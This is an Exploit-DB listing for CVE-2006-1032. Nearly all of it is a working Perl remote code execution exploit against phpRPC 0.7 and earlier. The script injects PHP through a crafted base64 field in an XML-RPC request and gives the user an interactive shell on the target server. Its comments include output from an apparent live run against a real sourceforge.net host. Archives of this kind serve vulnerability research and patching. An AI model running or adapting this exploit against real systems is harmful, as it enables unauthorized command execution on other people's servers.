phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution

2006-03-01T00:00:00
ID EDB-ID:1542
Type exploitdb
Reporter LorD
Modified 2006-03-01T00:00:00

Description

phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution. CVE-2006-1032. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
#
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
#--== IHS IRAN HOMELAND SECURITY ==--
#
#phpRPC &lt;= 0.7 commands execute exploit by LorD (http://www.ihs.ir)
#
#[IRAN HOMELAND SECURITY]$ uname -a;id;pwd
#Linux sc8-pr-web9.sourceforge.net 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686 i686 i386 GNU/Linux
#uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
#/home/groups/p/ph/phprpc/htdocs/modules/phpRPC
#_end_
#[IRAN HOMELAND SECURITY]$
#
#
# 0rginal Advisory : http://www.gulftech.org/?node=research&article_id=00105-02262006
# Greetz to NT and C0d3r
use IO::Socket;
print "--== IHS IRAN HOMELAND SECURITY ==--\n\n";
print "phpRPC &lt;= 0.7 commands execute exploit by LorD (http://www.ihs.ir)\n\n";
if ($ARGV[0] && $ARGV[1])
{
	$host = $ARGV[0];
	$xml = $ARGV[1];
	$sock = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$host",
	PeerPort =&gt; "80") || die "connecterror\n";
	while (1) {
		print '[IRAN HOMELAND SECURITY]$ ';
		$cmd = &lt;STDIN&gt;;
		chop($cmd);
		last if ($cmd eq 'exit');
		$xmldata = "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;test.method&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;base64&gt;'));echo '_begin_\n';echo `".$cmd."`;echo '_end_\n';exit;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;";
		print $sock "POST ".$xml." HTTP/1.1\n";
		print $sock "Host: ".$host."\n";
		print $sock "Content-Type: text/xml\n";
		print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
		$good=0;
		while ($ans = &lt;$sock&gt;)
		{
			if ($good == 1) { print "$ans"; }
			last if ($ans =~ /^_end_/);
			if ($ans =~ /^_begin_/) { $good = 1; }
		}
		if ($good==0) {print "Exploit Failed\n";exit();}
	}
}
else {
	print "Usage: perl rpc.pl host path_to_phpRPC\n\n";
	print "Example: perl rpc.pl target.com /server.php\n";
	exit;
}

# milw0rm.com [2006-03-01]